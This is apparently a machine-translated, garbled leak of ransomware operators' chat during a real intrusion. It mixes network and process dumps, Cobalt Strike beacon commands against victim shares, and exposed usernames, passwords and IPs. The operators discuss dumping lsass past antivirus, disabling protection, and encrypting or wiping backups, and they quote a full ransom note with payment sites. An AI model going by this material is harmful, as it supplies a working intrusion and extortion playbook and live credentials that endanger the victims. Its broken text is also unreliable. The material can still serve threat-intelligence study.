scanners check not through edr_q51B↩zeguya especially in the console av not looked into no one has downloaded the dll, i will check if i have it everywhere, can't i download the build?
interesting fact you threw in) by the way, the session dies after 30 seconds freshly built dll i'm not sure if all servers are av managed from konosli makaffi 20 min a should be reddish on the same sabinet? on the net how? on the dedik was a few komponu were yellow, became green) do not like it i think) WakeMeOnLan I ran a fordcast on the deck, there were a few computers, they kinda woke up and what was the wol and how did you test? I looked there) they're always ready wol tested, it seems to work on rdp odgotovil WOL software, shredders, batniks, etc? user4 user8 user7 user3 then work but there is nothing) there is an option edit cloud from the top left like a menu item look lagia unleashed 10.1.20.183 MAIN\blove wingnut12# 206.221.188.106:52786 give me access and sostam what do we have? the first 3 items on the left look at the settings) now their computers are off in bludhoudn two computers with active sessions YES, in addition to dkne, you need to reserver admin, well only

```
TCP    0.0.0.0:6169    0.0.0.0:0    LISTENING    4676
```

and and also, the backup process does not always keep the connection open + and the pid is the same? on the pid, well it is not there, so it does not knock) there is no process a as you understood?
Active Connections Proto Local Address Foreign Address State PID TCP 0.0.0.0:111 0.0.0.0:0 LISTENING 2304 TCP 0.0.0.0:135 0.0.0.0:0 LISTENING 756 TCP 0.0.0.0:445 0.0.0.0:0 LISTENING 4 TCP 0.0.0.0:1063 0.0.0.0:0 LISTENING 2304 TCP 0.0.0.0:1433 0.0.0.0:0 LISTENING 1644 TCP 0.0.0.0:2049 0.0.0.0:0 LISTENING 2304 TCP 0.0.0.0:3389 0.0.0.0:0 LISTENING 3160 TCP 0.0.0.0:5985 0.0.0.0:0 LISTENING 4 TCP 0.0.0.0:6160 0.0.0.0:0 LISTENING 1900 TCP 0.0.0.0:6161 0.0.0.0:0 LISTENING 2304 TCP 0.0.0.0:6162 0.0.0.0:0 LISTENING 2352 TCP 0.0.0.0:6169 0.0.0.0:0 LISTENING 4676 TCP 0.0.0.0:6170 0.0.0.0:0 LISTENING 5300 TCP 0.0.0.0:6172 0.0.0.0:0 LISTENING 4 TCP 0.0.0.0:6190 0.0.0.0:0 LISTENING 2392 TCP 0.0.0.0:6210 0.0.0.0:0 LISTENING 2176 TCP 0.0.0.0:6290 0.0.0.0:0 LISTENING 2392 TCP 0.0.0.0:8081 0.0.0.0:0 LISTENING 1232 TCP 0.0.0.0:9380 0.0.0.0:0 LISTENING 1924 TCP 0.0.0.0:9381 0.0.0.0:0 LISTENING 1924 TCP 0.0.0.0:9392 0.0.0.0:0 LISTENING 3316 TCP 0.0.0.0:9393 0.0.0.0:0 LISTENING 4276 TCP 0.0.0.0:9396 0.0.0.0:0 LISTENING 3680 TCP 0.0.0.0:9401 0.0.0.0:0 LISTENING 3316 TCP 0.0.0.0:9501 0.0.0.0:0 LISTENING 3692 TCP 0.0.0.0:10001 0.0.0.0:0 LISTENING 3316 TCP 0.0.0.0:10002 0.0.0.0:0 LISTENING 3316 TCP 0.0.0.0:10003 0.0.0.0:0 LISTENING 4676 TCP 0.0.0.0:10005 0.0.0.0:0 LISTENING 3316 TCP 0.0.0.0:10006 0.0.0.0:0 LISTENING 3316 TCP 0.0.0.0:10050 0.0.0.0:0 LISTENING 1848 TCP 0.0.0.0:11731 0.0.0.0:0 LISTENING 1900 TCP 0.0.0.0:47001 0.0.0.0:0 LISTENING 4 TCP 0.0.0.0:49152 0.0.0.0:0 LISTENING 540 TCP 0.0.0.0:49153 0.0.0.0:0 LISTENING 864 TCP 0.0.0.0:49154 0.0.0.0:0 LISTENING 888 TCP 0.0.0.0:49155 0.0.0.0:0 LISTENING 640 TCP 0.0.0.0:49156 0.0.0.0:0 LISTENING 640 TCP 0.0.0.0:49157 0.0.0.0:0 LISTENING 1036 TCP 0.0.0.0:49203 0.0.0.0:0 LISTENING 632 TCP 0.0.0.0:49204 0.0.0.0:0 LISTENING 3192 TCP 10.1.20.183:139 0.0.0.0:0 LISTENING 4 TCP 10.1.20.183:301 10.10.1.69:2049 ESTABLISHED 1900 TCP 10.1.20.183:302 10.10.1.46:2049 ESTABLISHED 1900 TCP 10.1.20.183:303 10.10.1.43:2049 ESTABLISHED 1900 TCP 
10.1.20.183:305 10.10.1.43:2049 ESTABLISHED 1900 TCP 10.1.20.183:445 10.1.20.113:65195 ESTABLISHED 4 TCP 10.1.20.183:3389 192.168.9.179:55814 ESTABLISHED 3160 TCP 10.1.20.183:9392 10.1.20.183:60589 ESTABLISHED 3316 TCP 10.1.20.183:9396 192.168.9.179:58127 ESTABLISHED 3680 TCP 10.1.20.183:9396 192.168.9.179:58869 ESTABLISHED 3680 TCP 10.1.20.183:10050 10.1.200.69:32768 TIME_WAIT 0 TCP 10.1.20.183:10050 10.1.200.69:32786 TIME_WAIT 0 TCP 10.1.20.183:10050 10.1.200.69:32880 TIME_WAIT 0 TCP 10.1.20.183:10050 10.1.200.69:32882 TIME_WAIT 0 TCP 10.1.20.183:10050 10.1.200.69:32972 TIME_WAIT 0 TCP 10.1.20.183:10050 10.1.200.69:33010 TIME_WAIT 0 TCP 10.1.20.183:10050 10.1.200.69:33036 TIME_WAIT 0 TCP 10.1.20.183:10050 10.1.200.69:33246 TIME_WAIT 0 TCP 10.1.20.183:10050 10.1.200.69:33266 TIME_WAIT 0 TCP 10.1.20.183:10050 10.1.200.69:33464 TIME_WAIT 0 TCP 10.1.20.183:10050 10.1.200.69:33764 TIME_WAIT 0 TCP 10.1.20.183:10050 10.1.200.69:33942 TIME_WAIT 0 TCP 10.1.20.183:10050 10.1.200.69:34178 TIME_WAIT 0 TCP 10.1.20.183:10050 10.1.200.69:34238 TIME_WAIT 0 TCP 10.1.20.183:10050 10.1.200.69:34372 TIME_WAIT 0 TCP 10.1.20.183:10050 10.1.200.69:34542 TIME_WAIT 0 TCP 10.1.20.183:10050 10.1.200.69:34682 TIME_WAIT 0 TCP 10.1.20.183:10050 10.1.200.69:34696 TIME_WAIT 0 TCP 10.1.20.183:10050 10.1.200.69:34866 TIME_WAIT 0 TCP 10.1.20.183:10050 10.1.200.69:35004 TIME_WAIT 0 TCP 10.1.20.183:10050 10.1.200.69:35090 TIME_WAIT 0 TCP 10.1.20.183:10050 10.1.200.69:35206 TIME_WAIT 0 TCP 10.1.20.183:10050 10.1.200.69:35294 TIME_WAIT 0 TCP 10.1.20.183:10050 10.1.200.69:49650 TIME_WAIT 0 TCP 10.1.20.183:10050 10.1.200.69:49782 TIME_WAIT 0 TCP 10.1.20.183:10050 10.1.200.69:49866 TIME_WAIT 0 TCP 10.1.20.183:10050 10.1.200.69:50016 TIME_WAIT 0 TCP 10.1.20.183:10050 10.1.200.69:50076 TIME_WAIT 0 TCP 10.1.20.183:10050 10.1.200.69:50188 TIME_WAIT 0 TCP 10.1.20.183:10050 10.1.200.69:50250 TIME_WAIT 0 TCP 10.1.20.183:10050 10.1.200.69:50416 TIME_WAIT 0 TCP 10.1.20.183:10050 10.1.200.69:50538 TIME_WAIT 0 TCP 
10.1.20.183:10050 10.1.200.69:50652 TIME_WAIT 0 TCP 10.1.20.183:10050 10.1.200.69:50836 TIME_WAIT 0 TCP 10.1.20.183:10050 10.1.200.69:50958 TIME_WAIT 0 TCP 10.1.20.183:10050 10.1.200.69:50970 TIME_WAIT 0 TCP 10.1.20.183:10050 10.1.200.69:51108 TIME_WAIT 0 TCP 10.1.20.183:10050 10.1.200.69:51270 TIME_WAIT 0 TCP 10.1.20.183:10050 10.1.200.69:51410 TIME_WAIT 0 TCP 10.1.20.183:10050 10.1.200.69:51518 TIME_WAIT 0 TCP 10.1.20.183:10050 10.1.200.69:51584 TIME_WAIT 0 TCP 10.1.20.183:10050 10.1.200.69:51706 TIME_WAIT 0 TCP 10.1.20.183:10050 10.1.200.69:51852 TIME_WAIT 0 TCP 10.1.20.183:10050 10.1.200.69:52014 TIME_WAIT 0 TCP 10.1.20.183:10050 10.1.200.69:52122 TIME_WAIT 0 TCP 10.1.20.183:10050 10.1.200.69:52284 TIME_WAIT 0 TCP 10.1.20.183:10050 10.1.200.69:52372 TIME_WAIT 0 TCP 10.1.20.183:10050 10.1.200.69:52536 TIME_WAIT 0 TCP 10.1.20.183:10050 10.1.200.69:52654 TIME_WAIT 0 TCP 10.1.20.183:10050 10.1.200.69:52804 TIME_WAIT 0 TCP 10.1.20.183:10050 10.1.200.69:52836 TIME_WAIT 0 TCP 10.1.20.183:10050 10.1.200.69:52938 TIME_WAIT 0 TCP 10.1.20.183:10050 10.1.200.69:52996 TIME_WAIT 0 TCP 10.1.20.183:10050 10.1.200.69:53002 TIME_WAIT 0 TCP 10.1.20.183:10050 10.1.200.69:53094 TIME_WAIT 0 TCP 10.1.20.183:10050 10.1.200.69:53118 TIME_WAIT 0 TCP 10.1.20.183:10050 10.1.200.69:53192 TIME_WAIT 0 TCP 10.1.20.183:10050 10.1.200.69:53374 TIME_WAIT 0 TCP 10.1.20.183:10050 10.1.200.69:53384 TIME_WAIT 0 TCP 10.1.20.183:10050 10.1.200.69:53482 TIME_WAIT 0 TCP 10.1.20.183:10050 10.1.200.69:53592 TIME_WAIT 0 TCP 10.1.20.183:10050 10.1.200.69:53744 TIME_WAIT 0 TCP 10.1.20.183:10050 10.1.200.69:53858 TIME_WAIT 0 TCP 10.1.20.183:10050 10.1.200.69:53944 TIME_WAIT 0 TCP 10.1.20.183:10050 10.1.200.69:53958 TIME_WAIT 0 TCP 10.1.20.183:10050 10.1.200.69:54060 TIME_WAIT 0 TCP 10.1.20.183:10050 10.1.200.69:54074 TIME_WAIT 0 TCP 10.1.20.183:10050 10.1.200.69:54118 TIME_WAIT 0 TCP 10.1.20.183:10050 10.1.200.69:54170 TIME_WAIT 0 TCP 10.1.20.183:10050 10.1.200.69:54262 TIME_WAIT 0 TCP 10.1.20.183:10050 
10.1.200.69:54378 TIME_WAIT 0 TCP 10.1.20.183:10050 10.1.200.69:54532 TIME_WAIT 0 TCP 10.1.20.183:10050 10.1.200.69:54626 TIME_WAIT 0 TCP 10.1.20.183:10050 10.1.200.69:54988 TIME_WAIT 0 TCP 10.1.20.183:10050 10.1.200.69:55106 TIME_WAIT 0 TCP 10.1.20.183:10050 10.1.200.69:55296 TIME_WAIT 0 TCP 10.1.20.183:10050 10.1.200.69:55474 TIME_WAIT 0 TCP 10.1.20.183:10050 10.1.200.69:55610 TIME_WAIT 0 TCP 10.1.20.183:10050 10.1.200.69:55682 TIME_WAIT 0 TCP 10.1.20.183:10050 10.1.200.69:55780 TIME_WAIT 0 TCP 10.1.20.183:10050 10.1.200.69:55974 TIME_WAIT 0 TCP 10.1.20.183:10050 10.1.200.69:56038 TIME_WAIT 0 TCP 10.1.20.183:10050 10.1.200.69:56156 TIME_WAIT 0 TCP 10.1.20.183:10050 10.1.200.69:56262 TIME_WAIT 0 TCP 10.1.20.183:10050 10.1.200.69:56344 TIME_WAIT 0 TCP 10.1.20.183:10050 10.1.200.69:56504 TIME_WAIT 0 TCP 10.1.20.183:10050 10.1.200.69:56610 TIME_WAIT 0 TCP 10.1.20.183:10050 10.1.200.69:56716 TIME_WAIT 0 TCP 10.1.20.183:10050 10.1.200.69:56778 TIME_WAIT 0 TCP 10.1.20.183:10050 10.1.200.69:56912 TIME_WAIT 0 TCP 10.1.20.183:10050 10.1.200.69:57018 TIME_WAIT 0 TCP 10.1.20.183:10050 10.1.200.69:57162 TIME_WAIT 0 TCP 10.1.20.183:10050 10.1.200.69:57262 TIME_WAIT 0 TCP 10.1.20.183:10050 10.1.200.69:57396 TIME_WAIT 0 TCP 10.1.20.183:10050 10.1.200.69:57434 TIME_WAIT 0 TCP 10.1.20.183:10050 10.1.200.69:57606 TIME_WAIT 0 TCP 10.1.20.183:10050 10.1.200.69:57746 TIME_WAIT 0 TCP 10.1.20.183:10050 10.1.200.69:57820 TIME_WAIT 0 TCP 10.1.20.183:10050 10.1.200.69:57944 TIME_WAIT 0 TCP 10.1.20.183:10050 10.1.200.69:58116 TIME_WAIT 0 TCP 10.1.20.183:10050 10.1.200.69:58248 TIME_WAIT 0 TCP 10.1.20.183:10050 10.1.200.69:58334 TIME_WAIT 0 TCP 10.1.20.183:10050 10.1.200.69:58466 TIME_WAIT 0 TCP 10.1.20.183:10050 10.1.200.69:58594 TIME_WAIT 0 TCP 10.1.20.183:10050 10.1.200.69:58730 TIME_WAIT 0 TCP 10.1.20.183:10050 10.1.200.69:58848 TIME_WAIT 0 TCP 10.1.20.183:10050 10.1.200.69:58960 TIME_WAIT 0 TCP 10.1.20.183:10050 10.1.200.69:59064 TIME_WAIT 0 TCP 10.1.20.183:10050 10.1.200.69:59212 
TIME_WAIT 0 TCP 10.1.20.183:10050 10.1.200.69:59308 TIME_WAIT 0 TCP 10.1.20.183:10050 10.1.200.69:59464 TIME_WAIT 0 TCP 10.1.20.183:10050 10.1.200.69:59572 TIME_WAIT 0 TCP 10.1.20.183:10050 10.1.200.69:59708 TIME_WAIT 0 TCP 10.1.20.183:10050 10.1.200.69:59814 TIME_WAIT 0 TCP 10.1.20.183:10050 10.1.200.69:59982 TIME_WAIT 0 TCP 10.1.20.183:10050 10.1.200.69:59994 TIME_WAIT 0 TCP 10.1.20.183:10050 10.1.200.69:60046 TIME_WAIT 0 TCP 10.1.20.183:10050 10.1.200.69:60096 TIME_WAIT 0 TCP 10.1.20.183:10050 10.1.200.69:60178 TIME_WAIT 0 TCP 10.1.20.183:10050 10.1.200.69:60190 TIME_WAIT 0 TCP 10.1.20.183:10050 10.1.200.69:60282 TIME_WAIT 0 TCP 10.1.20.183:10050 10.1.200.69:60368 TIME_WAIT 0 TCP 10.1.20.183:10050 10.1.200.69:60442 TIME_WAIT 0 TCP 10.1.20.183:10050 10.1.200.69:60560 TIME_WAIT 0 TCP 10.1.20.183:10050 10.1.200.69:60656 TIME_WAIT 0 TCP 10.1.20.183:10050 10.1.200.69:60794 TIME_WAIT 0 TCP 10.1.20.183:10050 10.1.200.69:60894 TIME_WAIT 0 TCP 10.1.20.183:51988 10.1.20.112:445 ESTABLISHED 4 TCP 10.1.20.183:51990 10.1.20.112:445 ESTABLISHED 4 TCP 10.1.20.183:60489 10.1.20.183:9392 TIME_WAIT 0 TCP 10.1.20.183:60498 10.1.20.183:9392 TIME_WAIT 0 TCP 10.1.20.183:60499 10.1.20.183:9392 TIME_WAIT 0 TCP 10.1.20.183:60503 10.1.20.183:9392 TIME_WAIT 0 TCP 10.1.20.183:60506 10.1.20.183:9392 TIME_WAIT 0 TCP 10.1.20.183:60507 10.1.20.140:49669 TIME_WAIT 0 TCP 10.1.20.183:60521 10.1.20.183:9392 TIME_WAIT 0 TCP 10.1.20.183:60524 10.1.20.183:9392 TIME_WAIT 0 TCP 10.1.20.183:60525 10.1.20.183:9392 TIME_WAIT 0 TCP 10.1.20.183:60532 10.1.20.183:9392 TIME_WAIT 0 TCP 10.1.20.183:60533 10.1.20.140:49669 TIME_WAIT 0 TCP 10.1.20.183:60536 10.1.20.183:9392 TIME_WAIT 0 TCP 10.1.20.183:60549 10.1.20.183:9392 TIME_WAIT 0 TCP 10.1.20.183:60553 10.1.20.183:9392 TIME_WAIT 0 TCP 10.1.20.183:60559 10.1.20.183:9392 TIME_WAIT 0 TCP 10.1.20.183:60561 10.1.20.140:49669 TIME_WAIT 0 TCP 10.1.20.183:60568 10.1.20.183:9501 TIME_WAIT 0 TCP 10.1.20.183:60569 10.1.20.183:9501 TIME_WAIT 0 TCP 10.1.20.183:60570 
10.1.20.183:9501 TIME_WAIT 0 TCP 10.1.20.183:60575 10.1.20.183:9392 TIME_WAIT 0 TCP 10.1.20.183:60576 10.1.20.183:9392 TIME_WAIT 0 TCP 10.1.20.183:60580 10.1.200.69:10051 TIME_WAIT 0 TCP 10.1.20.183:60583 10.1.20.140:49669 ESTABLISHED 640 TCP 10.1.20.183:60585 10.1.20.183:9392 TIME_WAIT 0 TCP 10.1.20.183:60589 10.1.20.183:9392 ESTABLISHED 8780 TCP 10.1.20.183:60598 173.234.155.15:443 LAST_ACK 2832 TCP 10.1.20.183:60599 173.234.155.15:443 LAST_ACK 568 TCP 127.0.0.1:1434 0.0.0.0:0 LISTENING 1644 TCP 127.0.0.1:6290 127.0.0.1:49196 ESTABLISHED 2392 TCP 127.0.0.1:49196 127.0.0.1:6290 ESTABLISHED 2352 TCP [::]:135 [::]:0 LISTENING 756 TCP [::]:445 [::]:0 LISTENING 4 TCP [::]:1433 [::]:0 LISTENING 1644 TCP [::]:3389 [::]:0 LISTENING 3160 TCP [::]:5985 [::]:0 LISTENING 4 TCP [::]:6160 [::]:0 LISTENING 1900 TCP [::]:6161 [::]:0 LISTENING 2304 TCP [::]:6162 [::]:0 LISTENING 2352 TCP [::]:6172 [::]:0 LISTENING 4 TCP [::]:6190 [::]:0 LISTENING 2392 TCP [::]:6210 [::]:0 LISTENING 2176 TCP [::]:8081 [::]:0 LISTENING 1232 TCP [::]:10050 [::]:0 LISTENING 1848 TCP [::]:11731 [::]:0 LISTENING 1900 TCP [::]:47001 [::]:0 LISTENING 4 TCP [::]:49152 [::]:0 LISTENING 540 TCP [::]:49153 [::]:0 LISTENING 864 TCP [::]:49154 [::]:0 LISTENING 888 TCP [::]:49155 [::]:0 LISTENING 640 TCP [::]:49156 [::]:0 LISTENING 640 TCP [::]:49157 [::]:0 LISTENING 1036 TCP [::]:49203 [::]:0 LISTENING 632 TCP [::]:49204 [::]:0 LISTENING 3192 TCP [::1]:1434 [::]:0 LISTENING 1644 UDP 0.0.0.0:111 *:* 2304 UDP 0.0.0.0:123 *:* 912 UDP 0.0.0.0:500 *:* 888 UDP 0.0.0.0:1063 *:* 2304 UDP 0.0.0.0:2049 *:* 2304 UDP 0.0.0.0:3389 *:* 3160 UDP 0.0.0.0:4500 *:* 888 UDP 0.0.0.0:5355 *:* 968 UDP 0.0.0.0:8082 *:* 1232 UDP 10.1.20.183:137 *:* 4 UDP 10.1.20.183:138 *:* 4 UDP 127.0.0.1:55150 *:*:640 UDP 127.0.0.1:63057 *:* 888 UDP 127.0.0.1:63060 *:* 968 UDP 127.0.0.1:64301 *:* 1308 UDP [::]:123 *:* 912 UDP [:]:500 *:* 888 UDP [:]:3389 *:*:3160 UDP [:]:4500 *:*:888 UDP [:]:8082 *:*:1232 ``This process doesn't knock anywhere? 
```
[-] screenshot from desktop 0 is empty
```

empty Show me a screenshot of my desktop and jump to the process Microsoft Windows Server 2012 R2 Standard What is os7) and cmd5 has no clears (then we will look at it together, i will jump there and take a dump. no, i went there a couple hours ago give me a screenshots of what you see there? local backups i see all my tasks, servers, etc. the cloud tab only has a plug in and something like find providers but not configured? but the software is yes, i checked it there's no cloud configured is there a thing? veema backup and replication https://www.veeam.com/cloud-connect-backup-service-providers.html by rp probably a cloud backup did you go there? local use if this stuff connects anywhere there's a chance of a cloud backups no other sign of a cloud backups found look at netstat first it's very easy cloud backups go to rdp under the admin from which the process is hovering and check if there is a cloud backup configured what settings did you want to find? not sure about that + ready? https://niceadd.com

----------------------------------------------------------------------------------------
209.222.101.167:10918 uVTxvMXJAvo6Vxsuw6iFhfu6YtstdU9kKPV

I'll ping the pool from 2008 Mpaq123 /user:grouphc\linrcbatch Any domain? with creeds if 2008 falls under ms17? probably detects as a dump lsass file deletes nothing writes? tried procdump just in .dmp? tried all kinds of minidumps and so on? i don't know why mcafee is blocking ... it's not ready yet, hb has delays Thursday labs would like to get information and how is the recruiting going? where's the fresh blood?)) 5-6 pcs so i got into a few user cars for fuck you hashdump? first time i hear that mcafee creates such problems.. o_only cut off macafi) if yes - no way? any thoughts? if memory is protected? how to remove hashdump listen to okaysnom before sleep i'll be back today?
i'll throw it off then hardly have time for another 30 minutes) aha? hello mini report on sonic? Extracting DPAPI Backup Keys with Domain Admin https://www.ired.team/offensive-security/credential-access-and-credential-dumping/reading-dpapi-encrypted-secrets-with-mimikatz-and-c++ hi hello all) Till Mon, and you) have a good weekend on Mon by 5 on this one and all then arms still puffing, most of the server alive and put it damaged as I understand it, because it was in the process 2-2.5 hours there was 1 file left it turns out the rest is all put? +server? went off (then wait for the file not everywhere reached zamaplyenyh yes, is there a note at least one armas? there are few alive, the ones that stretch - pulled and ran his hands

```
beacon> shell net view \\10.0.6.56
[*] Tasked beacon to run: net view \\10.0.6.56
[+] host called home, sent: 51 bytes
[+] received output:
Shared resources at \\10.0.6.56

Share name  Type  Used as  Comment
-------------------------------------------------------------------------------
C           Disk
D           Disk
The command completed successfully.
```

So I should get to them but they are unattached and the processes are killed but I haven't got to them yet or what, but they are untouched

```
beacon> shell net use
[*] Tasked beacon to run: net use
[+] host called home, sent: 38 bytes
[+] received output:
New connections will be remembered.

Status        Local  Remote           Network
-------------------------------------------------------------------------------
Disconnected  N:     \\10.0.6.40\c$   Microsoft Windows Network
Disconnected  O:     \\10.0.2.120\c$  Microsoft Windows Network
Disconnected  P:     \\10.0.6.75\c$   Microsoft Windows Network
Disconnected  Q:     \\10.0.2.215\c$  Microsoft Windows Network
Disconnected  R:     \\10.0.6.77\c$   Microsoft Windows Network
Disconnected  S:     \\10.0.6.64\c$   Microsoft Windows Network
Disconnected  T:     \\10.0.6.121\c$  Microsoft Windows Network
Disconnected  U:     \\10.0.6.147$    Microsoft Windows Network
Disconnected  V:     \\10.0.6.93\c$   Microsoft Windows Network
Disconnected  W:     \\10.0.1.178\c$  Microsoft Windows Network
Disconnected  X:     \\10.0.6.56\c$   Microsoft Windows Network
Disconnected  Y:     \\10.0.6.94\c$   Microsoft Windows Network
Disconnected  Z:     \\10.0.6.61\c$   Microsoft Windows Network
The command completed successfully.

beacon> shell dir N:
[*] Tasked beacon to run: dir N:
[+] host called home, sent: 37 bytes
[+] received output:
 Volume in drive N is OS
 Volume Serial Number is 22CF-C5F8

 Directory of N:\

05/11/2020  06:06 AM              Apps
10/16/2020  02:17 PM      550,254 dcagentInstaller.log
05/11/2020  06:57 AM              Dell
10/16/2020  02:19 PM              Downloads
05/11/2020  05:56 AM              Drivers
01/22/2021  01:05 AM              Intel
10/21/2020  02:54 AM              kworking
03/18/2019  11:52 PM              PerfLogs
10/16/2020  02:55 PM              Program Files
12/27/2020  02:04 PM              Program Files (x86)
10/16/2020  02:37 PM        4,722 SSDXFlashLog.zip
10/16/2020  02:45 PM              temp
10/16/2020  03:30 PM              Users
01/01/2021  01:02 AM              Windows
10/16/2020  02:55 PM              Windows10Upgrade
               2 File(s)        554,976 bytes
              13 Dir(s)  191,506,898,944 bytes free
```

arms check now servers let's wait 1 file? servers and armas ok? they will not understand) by fax already) send a note to your pager * i have a note where is the note you have a note? better.
i have a screenshot of the note aahhan you or a screenshot of the note) 0kekmb leave a note to check the quarantine bolshoy dosheshypeshy and everything too trand fucks the brain Because gladioluson there is also, but it fucks why i thought there mcafee) he = trand everywhere he stands no notes on the contrary where the trend - there are notes there trendmicro just say that even with macafee there are notes deleted only in one place? well on dc will see then ahehane they do not think) well what they will not get from quarantine? from gui? no way to kill the process to disable the protection? the population where the backups were we wiped the files, or else there pussy would be another 9 hours delayed? Backup servers are encrypted the process goes up immediately, the service doesn't shut down they've been shut down before

```
E:\SKYNASSC Backup\ISO Images\Backup_Exec_2012_14.0_SP2_MultiPlatforms_Multilingual.zip.2of2.id-D630D304.[stopstorage@qq.com].java.HAWFH
```

Network can't stop protection?
There is no such function if it's not everywhere Add to exceptions There is no trendMicro all windows `SKY-TS02` is also fine `SKY-TS01`

```
 Directory of C:\

01/29/2021  08:42 PM        1,558 .rnd.HAWFH
01/29/2021  08:42 PM              AdwCleaner
01/29/2021  08:42 PM              apps
01/29/2021  08:42 PM          536 ARCAOS.txt.HAWFH
01/29/2021  09:34 PM              Avantext
01/29/2021  08:43 PM              Avantext.old
12/25/2017  12:11 PM              CPPRO
08/21/2019  01:17 PM              inetpub
01/17/2018  02:12 AM              Klogs
06/17/2018  12:30 AM              Kmonitorsets
11/25/2020  04:42 PM              kworking
07/13/2009  10:20 PM              PerfLogs
12/07/2020  12:05 AM              Program Files
12/30/2020  07:47 AM              Program Files (x86)
01/29/2021  08:42 PM          930 readme.txt
01/29/2021  08:42 PM          551 reboot.cmd.HAWFH
12/24/2020  12:45 PM              symbols
11/02/2020  04:19 PM              TEMP
06/28/2019  03:18 PM              temp1
03/14/2017  03:27 PM              TFBO Reports
09/10/2019  07:42 AM              time keeper
01/26/2017  11:02 PM              txtav
01/17/2021  06:05 PM              Users
01/29/2021  07:13 PM              Windows
               4 File(s)          3,575 bytes
              20 Dir(s)  31,755,657,216 bytes free

beacon> shell type C:\readme.txt
[*] Tasked beacon to run: type C:\readme.txt
[+] host called home, sent: 49 bytes
[+] received output:
All of your files are currently encrypted. Backups were encrypted or deleted, same as Shadow Copies.
If you try to use any additional recovery software - the files might be damaged, but if you are still willing to try - try it on the data of the lowest value.
To make sure that we REALLY CAN recover all of the encrypted data - we offer you to decrypt 2 random files of your choice completely free of charge.
The faster you reply - the easier and cheaper it will be.
To receive information on the price of the recovery software you can contact our team directly for further instructions through our website:
TOR VERSION : (you should download and install TOR browser first https://torproject.org)
http://contirecj4hbzmyzuydyzrvm2c65blmvhoj2cvf25zqj2dwrrqcq5oad.onion/
HTTPS VERSION : https://contirecovery.best
---BEGIN ID---
dgbmGEAzby8w4AXUtdoh6nTEfuymihxXn0pmdmtDDT3cjOjMsdxvZahDXRDeotyd
---END ID---
```

This one

```
[unreadable binary contents of an encrypted file were pasted here]
```

it's not clear, I'm looking somewhere, but it's crooked maybe... on the rdp went to the desktop, it appeared on the desktop and almost immediately disappeared at the end when all encrypted?

```
[unreadable binary contents of an encrypted file were pasted here]
```

There's a corp product that can be sewn in by default What's it got to do with it?
https://www.mcafee.com/enterprise/en-us/downloads/free-tools/interceptor.htmlОпять ``` *49128 632 TmListen.exe x64 0 NT AUTHORITY\SYSTEM ``It's the only one ``` 0 0 [System Process] 4 0 System x64 0 NT AUTHORITY\SYSTEM 356 4 smss.exe x64 0 NT AUTHORITY\SYSTEM 480 472 csrss.exe x64 0 NT AUTHORITY\SYSTEM 540 472 wininit.exe x64 0 NT AUTHORITY\SYSTEM 632 540 services.exe x64 0 NT AUTHORITY\SYSTEM 536 632 svchost.exe x64 0 NT AUTHORITY/NETWORK SERVICE 708 632 svchost.exe x64 0 NT AUTHORITY\SYSTEM 2432 708 WmiPrvSE.exe x64 0 NT AUTHORITY/\NETWORK SERVICE 3004 708 WmiPrvSE.exe x64 0 NT AUTHORITY/NETWORK SERVICE 37844 3004 cmd.exe x64 0 SKYTECH1\skyadmin 36296 37844 conhost.exe x64 0 SKYTECH1\skyadmin 38408 37844 DiskShare.exe x64 0 SKYTECH1\skyadmin 38464 38408 icacls.exe x64 0 SKYTECH1\skyadmin 38296 38464 conhost.exe x64 0 SKYTECH1\skyadmin 38740 38408 icacls.exe x64 0 SKYTECH1\skyadmin 35536 38740 conhost.exe x64 0 SKYTECH1\skyadmin 41780 3004 rundll32.exe x64 0 SKYTECH1\skyadmin 3044 708 WmiPrvSE.exe x64 0 NT AUTHORITY\SYSTEM 4528 708 PrintIsolationHost.exe x64 0 NT AUTHORITY\SYSTEM 166428 708 WmiPrvSE.exe x86 0 NT AUTHORITY\NETWORK SERVICE 184248 708 WmiPrvSE.exe x86 0 NT AUTHORITY/\SYSTEM 185016 708 WmiPrvSE.exe x86 0 NT AUTHORITY\LOCAL SERVICE 186124 708 WmiPrvSE.exe x64 0 NT AUTHORITY\LOCAL SERVICE 756 632 svchost.exe x64 0 NT AUTHORITY/NETWORK SERVICE 908 632 svchost.exe x64 0 NT AUTHORITY/LOCAL SERVICE 944 632 svchost.exe x64 0 NT AUTHORITY\SYSTEM 5432 944 taskhostex.exe x64 2 SKYTECH1\skyadmin 1004 632 svchost.exe x64 0 NT AUTHORITY/LOCAL SERVICE 1096 632 svchost.exe x64 0 NT AUTHORITY/LOCAL SERVICE 1196 632 vmtoolsd.exe x64 0 NT AUTHORITY/ LOCAL SERVICE 1308 632 spoolsv.exe x64 0 NT AUTHORITY\SYSTEM 1408 632 armsvc.exe x86 0 NT AUTHORITY\SYSTEM 1428 632 svchost.exe x64 0 NT AUTHORITY\SYSTEM 1448 632 svchost.exe x64 0 NT AUTHORITY\SYSTEM 1508 1448 dasHost.exe x64 0 NT AUTHORITY\LOCAL SERVICE 1492 632 g2ax_service.exe x86 0 NT AUTHORITY\SYSTEM 1676 1492 
g2ax_comm_customer.exe x86 0 NT AUTHORITY\SYSTEM 1084 1676 g2ax_system_customer.exe x86 0 NT AUTHORITY\SYSTEM 6868 1676 g2ax_user_customer.exe x86 2 SKYTECH1\skyadmin 1792 632 mqsvc.exe x64 0 NT AUTHORITY\NETWORK SERVICE 1892 632 svchost.exe x64 0 NT AUTHORITY\LOCAL SERVICE 1940 632 SMSvcHost.exe x64 0 NT AUTHORITY\LOCAL SERVICE 2124 632 svchost.exe x64 0 NT AUTHORITY\LOCAL SERVICE 2448 632 svchost.exe x64 0 NT AUTHORITY\LOCAL SERVICE 2552 632 SMSvcHost.exe x64 0 NT AUTHORITY\NETWORK SERVICE 4048 632 svchost.exe x64 0 NT AUTHORITY/NETWORK SERVICE 4088 632 svchost.exe x64 0 NT AUTHORITY/NETWORK SERVICE 4744 632 msdtc.exe x64 0 NT AUTHORITY/NETWORK SERVICE 9364 632 ramaint.exe x64 0 NT AUTHORITY\SYSTEM 9400 632 LMIGuardianSvc.exe x64 0 NT AUTHORITY\SYSTEM 48576 632 Ntrtscan.exe x64 0 NT AUTHORITY\SYSTEM 48728 632 svcGenericHost.exe x86 0 NT AUTHORITY\SYSTEM 47672 48728 HostedAgent.exe x86 0 NT AUTHORITY\SYSTEM 48920 47672 logWriter.exe x86 0 NT AUTHORITY\SYSTEM 49184 48920 conhost.exe x64 0 NT AUTHORITY\SYSTEM 48964 47672 conhost.exe x64 0 NT AUTHORITY\SYSTEM 49680 48728 TMCPMAdapter.exe x86 0 NT AUTHORITY\SYSTEM 